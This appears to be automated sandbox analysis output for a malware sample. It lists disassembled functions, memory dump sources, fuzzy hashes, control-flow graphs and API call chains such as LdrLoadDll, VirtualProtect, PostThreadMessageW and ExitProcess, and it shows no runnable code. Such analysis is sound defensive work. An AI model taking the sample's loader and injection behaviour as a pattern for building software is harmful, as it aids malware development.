                                                                                                                      • Source File: 00000000.00000002.1807414888.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8a0000_NdYuOgHbM9.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 5372aa64938ad99d6e0cfe188158907c69d0e6a777791e7dbf9fb04f31e59ee8
                                                                                                                      • Instruction ID: 9d05e9fb8460d6207d05d799be7e35906d1990d921d0c24f5de4cb03c55033d7
                                                                                                                      • Opcode Fuzzy Hash: 5372aa64938ad99d6e0cfe188158907c69d0e6a777791e7dbf9fb04f31e59ee8
                                                                                                                      • Instruction Fuzzy Hash: 4332E530B0DA0D8FDB68DB68D865A7977E5FF59300F15017EE04EC72A2DE24AD428B91
                                                                                                                      Function 00007FFD9B8A1050 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 266libraryCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1807414888.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8a0000_NdYuOgHbM9.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LibraryLoad
                                                                                                                      • String ID: $
                                                                                                                      • API String ID: 1029625771-3993045852
                                                                                                                      • Opcode ID: fd2eb2b2ce9d0621809835a8a0a20fee3f238e97285ab16bc21ca220632b4c8d
                                                                                                                      • Instruction ID: aed8b183ae6805263dae99c469130bf2723b447a62f95d7ff9ef7954a7a36653
                                                                                                                      • Opcode Fuzzy Hash: fd2eb2b2ce9d0621809835a8a0a20fee3f238e97285ab16bc21ca220632b4c8d
                                                                                                                      • Instruction Fuzzy Hash: 9E81E330608A8D4FDB58EF68D8567F57BE1FF5A310F10426EE81DC72A2DE68A841C791
                                                                                                                      Function 00007FFD9B98026B Relevance: 2.3, Strings: 1, Instructions: 1059COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 359 7ffd9b98026b-7ffd9b98026d 360 7ffd9b9803b1-7ffd9b9803b7 359->360 361 7ffd9b98026e-7ffd9b98027c 359->361 366 7ffd9b9803b9-7ffd9b9803c8 360->366 362 7ffd9b980284-7ffd9b980286 361->362 364 7ffd9b980288-7ffd9b980289 362->364 365 7ffd9b9802f7-7ffd9b980306 362->365 367 7ffd9b98024f-7ffd9b98026a 364->367 368 7ffd9b98028b 364->368 369 7ffd9b980307-7ffd9b980309 365->369 370 7ffd9b9803c9-7ffd9b980427 366->370 367->359 368->369 372 7ffd9b98028d 368->372 369->360 373 7ffd9b98030a-7ffd9b980348 369->373 385 7ffd9b98045c-7ffd9b980474 370->385 386 7ffd9b980429-7ffd9b980440 370->386 374 7ffd9b9802d4 372->374 375 7ffd9b98028f-7ffd9b9802a0 372->375 373->366 396 7ffd9b98034a-7ffd9b98034d 373->396 374->360 381 7ffd9b9802da-7ffd9b9802f5 374->381 383 7ffd9b980233-7ffd9b98024e 375->383 384 7ffd9b9802a2-7ffd9b9802b8 375->384 381->365 383->367 384->360 389 7ffd9b9802be-7ffd9b9802d1 384->389 390 7ffd9b980442-7ffd9b98045a 386->390 391 7ffd9b9804b1-7ffd9b9804d0 386->391 389->374 390->385 394 7ffd9b9804d1-7ffd9b9804e7 390->394 391->394 403 7ffd9b98051c-7ffd9b980534 394->403 404 7ffd9b9804e9-7ffd9b980500 394->404 396->370 399 7ffd9b98034f 396->399 401 7ffd9b980351-7ffd9b98035f 399->401 402 7ffd9b980396-7ffd9b9803b0 399->402 401->402 408 7ffd9b980502-7ffd9b98051a 404->408 409 7ffd9b980571-7ffd9b980590 404->409 408->403 410 7ffd9b980592-7ffd9b980595 409->410 411 7ffd9b980597-7ffd9b9805a7 409->411 410->411 415 7ffd9b9805dc-7ffd9b9805f4 411->415 416 7ffd9b9805a9-7ffd9b9805c0 411->416 417 7ffd9b9805c2-7ffd9b9805da 416->417 418 7ffd9b980631-7ffd9b980668 416->418 417->415 424 7ffd9b98069d-7ffd9b9806a8 418->424 425 7ffd9b98066a-7ffd9b98067a 418->425 431 7ffd9b9806bc-7ffd9b9806c5 424->431 432 7ffd9b9806aa-7ffd9b9806b9 424->432 426 7ffd9b98067c-7ffd9b98067e 425->426 427 7ffd9b9806eb-7ffd9b9806f9 425->427 429 7ffd9b980680 426->429 430 7ffd9b9806fa-7ffd9b98073c 426->430 427->430 434 7ffd9b980682-7ffd9b98069c 429->434 435 7ffd9b9806c6-7ffd9b9806c7 429->435 440 7ffd9b98073e 430->440 441 7ffd9b980786-7ffd9b98078b 430->441 431->435 432->431 434->424 442 7ffd9b980742-7ffd9b980772 440->442 443 7ffd9b980a42-7ffd9b980a56 441->443 444 7ffd9b98078c-7ffd9b98079e 441->444 442->443 445 7ffd9b980778-7ffd9b980781 442->445 451 7ffd9b980a57-7ffd9b980ab7 443->451 446 7ffd9b98079f-7ffd9b9807a5 444->446 447 7ffd9b980783-7ffd9b980785 445->447 446->442 448 7ffd9b9807a7-7ffd9b9807bd 446->448 447->441 448->443 452 7ffd9b9807c3-7ffd9b9807d6 448->452 456 7ffd9b980aec-7ffd9b980b04 451->456 457 7ffd9b980ab9-7ffd9b980ad0 451->457 459 7ffd9b9807d8-7ffd9b9807d9 452->459 460 7ffd9b980847-7ffd9b980856 452->460 462 7ffd9b980b41-7ffd9b980b77 456->462 461 7ffd9b980ad2-7ffd9b980aeb 457->461 457->462 459->446 466 7ffd9b9807db 459->466 465 7ffd9b980857-7ffd9b980859 460->465 461->456 468 7ffd9b980bac-7ffd9b980bc4 462->468 469 7ffd9b980b79-7ffd9b980b90 462->469 465->443 470 7ffd9b98085a-7ffd9b980872 465->470 466->465 471 7ffd9b9807dd 466->471 472 7ffd9b980b92-7ffd9b980bab 469->472 473 7ffd9b980c01-7ffd9b980c50 469->473 486 7ffd9b980874-7ffd9b980877 470->486 487 7ffd9b9808e3-7ffd9b9808f0 470->487 475 7ffd9b980824 471->475 476 7ffd9b9807df-7ffd9b9807f0 471->476 472->468 494 7ffd9b980c52-7ffd9b980c84 473->494 495 7ffd9b980cc1-7ffd9b980cfe 473->495 475->443 479 7ffd9b98082a-7ffd9b980845 475->479 476->447 482 7ffd9b9807f2-7ffd9b980808 476->482 479->460 482->443 488 7ffd9b98080e-7ffd9b980821 482->488 491 7ffd9b9808f3 486->491 492 7ffd9b980879 486->492 487->491 488->475 491->443 493 7ffd9b9808f9-7ffd9b98090c 491->493 496 7ffd9b9808c0 492->496 497 7ffd9b98087b-7ffd9b9808a2 492->497 508 7ffd9b98090e-7ffd9b980912 493->508 509 7ffd9b98097d-7ffd9b980990 493->509 498 7ffd9b9808c3-7ffd9b9808e1 496->498 499 7ffd9b9808c2 496->499 497->443 507 7ffd9b9808a8-7ffd9b9808be 497->507 498->487 499->498 507->443 507->496 512 7ffd9b980914 508->512 513 7ffd9b980993 508->513 509->513 514 7ffd9b980974-7ffd9b98097b 512->514 513->443 515 7ffd9b980999-7ffd9b9809b5 513->515 514->509 518 7ffd9b9809d2-7ffd9b9809e6 515->518 519 7ffd9b9809b7-7ffd9b9809cc 515->519 518->451 520 7ffd9b9809e8-7ffd9b9809ed 518->520 519->518 520->514 522 7ffd9b9809ef 520->522 522->443
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1807832388.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b980000_NdYuOgHbM9.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: A
                                                                                                                      • API String ID: 0-3554254475
                                                                                                                      • Opcode ID: 753dc5aed428e0d70ea3069bc009dcbf8214d4bfd3e094092ccd2b7739f7f537
                                                                                                                      • Instruction ID: f059d20810fb161713b5cb66b0af88ef19f717152bb6d41ee434cef53e4b33bd
                                                                                                                      • Opcode Fuzzy Hash: 753dc5aed428e0d70ea3069bc009dcbf8214d4bfd3e094092ccd2b7739f7f537
                                                                                                                      • Instruction Fuzzy Hash: 64626A72A1FB8A4FE765DB6888655A47BE0FF55700F0601FED08DCB0A3DA346946C781
                                                                                                                      Function 00007FFD9B8A09C8 Relevance: 1.8, APIs: 1, Instructions: 252COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1807414888.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8a0000_NdYuOgHbM9.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: ccc8c03b189e87bcffeed1e34700dda5e5420b2cae05b8f2bfa7067fe85c309d
                                                                                                                      • Instruction ID: ec7402d57de85fd8041c7181f1a24752ad4d9716c9082386662a51ad96169c6b
                                                                                                                      • Opcode Fuzzy Hash: ccc8c03b189e87bcffeed1e34700dda5e5420b2cae05b8f2bfa7067fe85c309d
                                                                                                                      • Instruction Fuzzy Hash: C271E721B1EB8D4FE799A7B884252F877E1EF9A710F0500BAD04EC31E2DD2C69468751
                                                                                                                      Function 00007FFD9B8A1654 Relevance: 1.6, APIs: 1, Instructions: 126memoryCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1048 7ffd9b8a1654-7ffd9b8a165b 1049 7ffd9b8a1666-7ffd9b8a171f VirtualProtect 1048->1049 1050 7ffd9b8a165d-7ffd9b8a1665 1048->1050 1053 7ffd9b8a1727-7ffd9b8a174f 1049->1053 1054 7ffd9b8a1721 1049->1054 1050->1049 1054->1053
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1807414888.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8a0000_NdYuOgHbM9.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ProtectVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 544645111-0
                                                                                                                      • Opcode ID: 652dfdf54e37a270d5adc61e33d98a5e31209fcda2c87ee85fcf0ab7deed26a5
                                                                                                                      • Instruction ID: 4d67a6d536115111a24fba7b647beb1e8c414a8740e3878e51b70a5338e322bc
                                                                                                                      • Opcode Fuzzy Hash: 652dfdf54e37a270d5adc61e33d98a5e31209fcda2c87ee85fcf0ab7deed26a5
                                                                                                                      • Instruction Fuzzy Hash: 7031C530A0CA4D8FDB1CDB989846AF9BBE1EF56321F04426FD059D3292CF646856C791
                                                                                                                      Function 00007FFD9B8A0901 Relevance: 1.6, APIs: 1, Instructions: 126COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1030 7ffd9b8a0901-7ffd9b8a0919 1031 7ffd9b8a091b-7ffd9b8a097c 1030->1031 1032 7ffd9b8a08ad-7ffd9b8a08b4 1030->1032 1042 7ffd9b8a097d-7ffd9b8a099c FreeConsole 1031->1042 1035 7ffd9b8a08b6-7ffd9b8a08d9 1032->1035 1036 7ffd9b8a08d2-7ffd9b8a08d9 1032->1036 1037 7ffd9b8a08e0-7ffd9b8a08fc 1035->1037 1036->1037 1044 7ffd9b8a099e 1042->1044 1045 7ffd9b8a09a4-7ffd9b8a09c0 1042->1045 1044->1045
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1807414888.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8a0000_NdYuOgHbM9.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ConsoleFree
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 771614528-0
                                                                                                                      • Opcode ID: 8079c1918c2efb9037f0f78bbdc2024989f726ebbff1afcbaec60ece2739d75c
                                                                                                                      • Instruction ID: fb64e03e02e52d162d1bdf5f0802f4176928af1c8a6439e9685f225a14acfb3e
                                                                                                                      • Opcode Fuzzy Hash: 8079c1918c2efb9037f0f78bbdc2024989f726ebbff1afcbaec60ece2739d75c
                                                                                                                      • Instruction Fuzzy Hash: 15319631A1CB0C8FDB68EBA8D455BE9B7E0EF59310F00416ED05EC3296DE75A846CB51
                                                                                                                      Function 00007FFD9B980E29 Relevance: .7, Instructions: 737COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1807832388.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b980000_NdYuOgHbM9.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c80b3bb781cc5f74cf47063cf6cb08af24de1f934fa894cbd025118b777d01c4
                                                                                                                      • Instruction ID: ceeea8c39f4a9159001151a0fd7d8863168c29fa0876cf03730746ad31c15ea2
                                                                                                                      • Opcode Fuzzy Hash: c80b3bb781cc5f74cf47063cf6cb08af24de1f934fa894cbd025118b777d01c4
                                                                                                                      • Instruction Fuzzy Hash: F2222931A1EBDE4FD766DB7488655A47BE1FF56304B0A01FEC089CB0A3DA38A946C741
                                                                                                                      Function 00007FFD9B981269 Relevance: .2, Instructions: 229COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1807832388.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b980000_NdYuOgHbM9.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 42b727af06a1fa14f30a72731c04aeb881ce5ca0904928ef208513398df20167
                                                                                                                      • Instruction ID: f90b5d6a075bd81d19350f932ee3a2bc049b7bc5560037db6f2c30eb7be97ab6
                                                                                                                      • Opcode Fuzzy Hash: 42b727af06a1fa14f30a72731c04aeb881ce5ca0904928ef208513398df20167
                                                                                                                      • Instruction Fuzzy Hash: 47612831A1EBCD4FD756DB7488659A47BF1EF1A304B0A01EBC04ACB1A7DE28A846C741

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:1.5%
                                                                                                                      Dynamic/Decrypted Code Coverage:5.1%
                                                                                                                      Signature Coverage:8.8%
                                                                                                                      Total number of Nodes:136
                                                                                                                      Total number of Limit Nodes:12
                                                                                                                      execution_graph 75909 42a503 75910 42a51d 75909->75910 75913 5772df0 LdrInitializeThunk 75910->75913 75911 42a542 75913->75911 75914 424083 75918 424092 75914->75918 75915 4240d6 75922 42cd13 75915->75922 75918->75915 75919 424114 75918->75919 75921 424119 75918->75921 75920 42cd13 RtlFreeHeap 75919->75920 75920->75921 75925 42b1b3 75922->75925 75924 4240e3 75926 42b1cd 75925->75926 75927 42b1db RtlFreeHeap 75926->75927 75927->75924 75928 401aa1 75929 401a8a 75928->75929 75930 401abd 75928->75930 75933 42e2b3 75930->75933 75936 42c903 75933->75936 75937 42c929 75936->75937 75948 4072a3 75937->75948 75939 401ba8 75940 42c93f 75940->75939 75951 41a7a3 75940->75951 75942 42c95e 75943 42c973 75942->75943 75966 42b1f3 75942->75966 75962 426fb3 75943->75962 75946 42c982 75947 42b1f3 ExitProcess 75946->75947 75947->75939 75969 4160a3 75948->75969 75950 4072b0 75950->75940 75952 41a7cf 75951->75952 75987 41a693 75952->75987 75955 41a7fc 75956 41a807 75955->75956 75993 42ae83 75955->75993 75956->75942 75958 41a830 75958->75942 75959 41a814 75959->75958 75960 42ae83 NtClose 75959->75960 75961 41a826 75960->75961 75961->75942 75963 42700d 75962->75963 75965 42701a 75963->75965 76001 417eb3 75963->76001 75965->75946 75967 42b20d 75966->75967 75968 42b21e ExitProcess 75967->75968 75968->75943 75970 4160ba 75969->75970 75972 4160d0 75970->75972 75973 42b8b3 75970->75973 75972->75950 75975 42b8cb 75973->75975 75974 42b8ef 75974->75972 75975->75974 75980 42a553 75975->75980 75978 42cd13 RtlFreeHeap 75979 42b957 75978->75979 75979->75972 75981 42a56d 75980->75981 75984 5772c0a 75981->75984 75982 42a596 75982->75978 75985 5772c11 75984->75985 75986 5772c1f LdrInitializeThunk 75984->75986 75985->75982 75986->75982 75988 41a6ad 75987->75988 75992 41a789 75987->75992 75996 42a5f3 75988->75996 75991 42ae83 NtClose 75991->75992 75992->75955 75992->75959 75994 42ae9d 75993->75994 75995 42aeab NtClose 75994->75995 75995->75956 75997 42a610 75996->75997 76000 57735c0 LdrInitializeThunk 75997->76000 75998 41a77d 75998->75991 76000->75998 76002 417edd 76001->76002 76003 41834b 76002->76003 76009 413ae3 76002->76009 76003->75965 76005 417fea 76005->76003 76006 42cd13 RtlFreeHeap 76005->76006 76007 418002 76006->76007 76007->76003 76008 42b1f3 ExitProcess 76007->76008 76008->76003 76016 413b02 76009->76016 76010 413c57 76010->76005 76012 413c20 76012->76010 76021 41aab3 RtlFreeHeap LdrInitializeThunk 76012->76021 76013 413c34 76013->76010 76022 41aab3 RtlFreeHeap LdrInitializeThunk 76013->76022 76015 413c4d 76015->76005 76016->76010 76016->76012 76018 413533 76016->76018 76023 42b0e3 76018->76023 76021->76013 76022->76015 76024 42b0fd 76023->76024 76027 5772c70 LdrInitializeThunk 76024->76027 76025 413555 76025->76012 76027->76025 76031 423cf3 76032 423d0f 76031->76032 76033 423d37 76032->76033 76034 423d4b 76032->76034 76036 42ae83 NtClose 76033->76036 76035 42ae83 NtClose 76034->76035 76038 423d54 76035->76038 76037 423d40 76036->76037 76041 42ce33 RtlAllocateHeap 76038->76041 76040 423d5f 76041->76040 76042 42ddf3 76043 42de03 76042->76043 76044 42de09 76042->76044 76047 42cdf3 76044->76047 76046 42de2f 76050 42b173 76047->76050 76049 42ce0e 76049->76046 76051 42b18d 76050->76051 76052 42b19b RtlAllocateHeap 76051->76052 76052->76049 76053 41a993 76054 41a9d7 76053->76054 76055 42ae83 NtClose 76054->76055 76056 41a9f8 76054->76056 76055->76056 76057 4139b3 76058 4139cd 76057->76058 76063 417363 76058->76063 76060 4139eb 76061 413a30 76060->76061 76062 413a1f PostThreadMessageW 76060->76062 76062->76061 76065 417387 76063->76065 76064 41738e 76064->76060 76065->76064 76066 4173c3 LdrLoadDll 76065->76066 76067 4173da 76065->76067 76066->76067 76067->76060 76068 41dab3 76069 41dad9 76068->76069 76073 41dbc7 76069->76073 76074 42df23 76069->76074 76071 41db6b 76072 42a553 LdrInitializeThunk 76071->76072 76071->76073 76072->76073 76075 42de93 76074->76075 76076 42cdf3 RtlAllocateHeap 76075->76076 76079 42def0 76075->76079 76077 42decd 76076->76077 76078 42cd13 RtlFreeHeap 76077->76078 76078->76079 76079->76071 76080 5772b60 LdrInitializeThunk 76028 418568 76029 42ae83 NtClose 76028->76029 76030 418572 76029->76030

                                                                                                                      Executed Functions

                                                                                                                      Function 00417363 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 146 417363-41737f 147 417387-41738c 146->147 148 417382 call 42da13 146->148 149 417392-4173a0 call 42df33 147->149 150 41738e-417391 147->150 148->147 153 4173b0-4173c1 call 42c3d3 149->153 154 4173a2-4173ad call 42e1d3 149->154 159 4173c3-4173d7 LdrLoadDll 153->159 160 4173da-4173dd 153->160 154->153 159->160
                                                                                                                      APIs
                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004173D5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1847525772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_400000_ngen.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Load
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2234796835-0
                                                                                                                      • Opcode ID: 42827f6d4e147cc66cda343915524e04a3ed7cc4cfed2bc2c8491ec10588e454
                                                                                                                      • Instruction ID: 348c565881aa1d8816b8c73a56510b337d58f260962ee2485de5f516c67fb9f8
                                                                                                                      • Opcode Fuzzy Hash: 42827f6d4e147cc66cda343915524e04a3ed7cc4cfed2bc2c8491ec10588e454
                                                                                                                      • Instruction Fuzzy Hash: 71015EB1E0020DABDF10DAE1DC42FDEB3B89B54304F0081AAED1897240F674EB54CB95
                                                                                                                      Function 0042AE83 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 182 42ae83-42aeb9 call 4049f3 call 42bf13 NtClose
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1847525772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_400000_ngen.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Close
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3535843008-0
                                                                                                                      • Opcode ID: 47efae5147df12e2a290532262f55778ee760547e7d53fcb4626249dd9ba2729
                                                                                                                      • Instruction ID: 39cc2db95d2c1e32b0c89d8faf5bffadc60fb7301eef618929bcda045d4bf150
                                                                                                                      • Opcode Fuzzy Hash: 47efae5147df12e2a290532262f55778ee760547e7d53fcb4626249dd9ba2729
                                                                                                                      • Instruction Fuzzy Hash: ADE08C76200224BBD620EA5ADC02F9B776DDFC5754F40852AFB08A7282C775BA11CBF4
                                                                                                                      Function 057735C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 199 57735c0-57735cc LdrInitializeThunk
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: a28201fbcb591597046f07a3b8406059d3ff68471fbd69c32b359b1337bcf308
                                                                                                                      • Instruction ID: c83fd34578e66cbe155d682c8d1c08174803478ed011ef1d584702baeff6c285
                                                                                                                      • Opcode Fuzzy Hash: a28201fbcb591597046f07a3b8406059d3ff68471fbd69c32b359b1337bcf308
                                                                                                                      • Instruction Fuzzy Hash: EF90023264550402D10071584594716101687E0311FE5C861A042457CD87958A5175A3
                                                                                                                      Function 05772DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 198 5772df0-5772dfc LdrInitializeThunk
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 5e6be231a41f35578fd596f1d1f1069f0ca77e2a00f3c40c32a56cb49c1530b7
                                                                                                                      • Instruction ID: 6751ddff0f31c4bb5b02c36fd4829a427871407abae86c30091645efb21a9279
                                                                                                                      • Opcode Fuzzy Hash: 5e6be231a41f35578fd596f1d1f1069f0ca77e2a00f3c40c32a56cb49c1530b7
                                                                                                                      • Instruction Fuzzy Hash: 6190023224140413D11171584584717001A87E0351FD5C862A042456CD96568A52B123
                                                                                                                      Function 05772C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 197 5772c70-5772c7c LdrInitializeThunk
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 27a132de30cf4c6182aec00f2e61b6de4db8393af495fb389af24b013a1dd161
                                                                                                                      • Instruction ID: 9497dcd419c5151561cb12b4a837270b37c2b3e49bb871177a4cb52c7c064f21
                                                                                                                      • Opcode Fuzzy Hash: 27a132de30cf4c6182aec00f2e61b6de4db8393af495fb389af24b013a1dd161
                                                                                                                      • Instruction Fuzzy Hash: 8090023224148802D1107158848475A001687E0311FD9C861A442466CD869589917123
                                                                                                                      Function 05772B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 196 5772b60-5772b6c LdrInitializeThunk
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 8cd06783b6d2a39a173ee6c4081daa0dcba2b791709d030f9be12882e926463c
                                                                                                                      • Instruction ID: ec335b8cee75abf0e2aaa185741dc9605a52044d2d56266e7c97e7bf0c72f13d
                                                                                                                      • Opcode Fuzzy Hash: 8cd06783b6d2a39a173ee6c4081daa0dcba2b791709d030f9be12882e926463c
                                                                                                                      • Instruction Fuzzy Hash: 6190026224240003410571584494626401B87F0311BD5C471E10145A4DC52589917127
                                                                                                                      Function 00413972 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65threadwindowCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(5HG1921,00000111,00000000,00000000), ref: 00413A2A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1847525772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_400000_ngen.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID: 5HG1921$5HG1921
                                                                                                                      • API String ID: 1836367815-1110840446
                                                                                                                      • Opcode ID: a52208edfe4a7457d95c3839d6cecff5ced651be8a54f796f27298b5aacc4b46
                                                                                                                      • Instruction ID: 110ba61cb0eadaa2828eb1967379c87dd0201bcb54f2560ca588a3153b121294
                                                                                                                      • Opcode Fuzzy Hash: a52208edfe4a7457d95c3839d6cecff5ced651be8a54f796f27298b5aacc4b46
                                                                                                                      • Instruction Fuzzy Hash: 8A11A7B1D0025CBEDB119BD19C81DEF7B7CDF81398F45406AF954A7200D5784F468BA5
                                                                                                                      Function 004139AC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63threadwindowCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
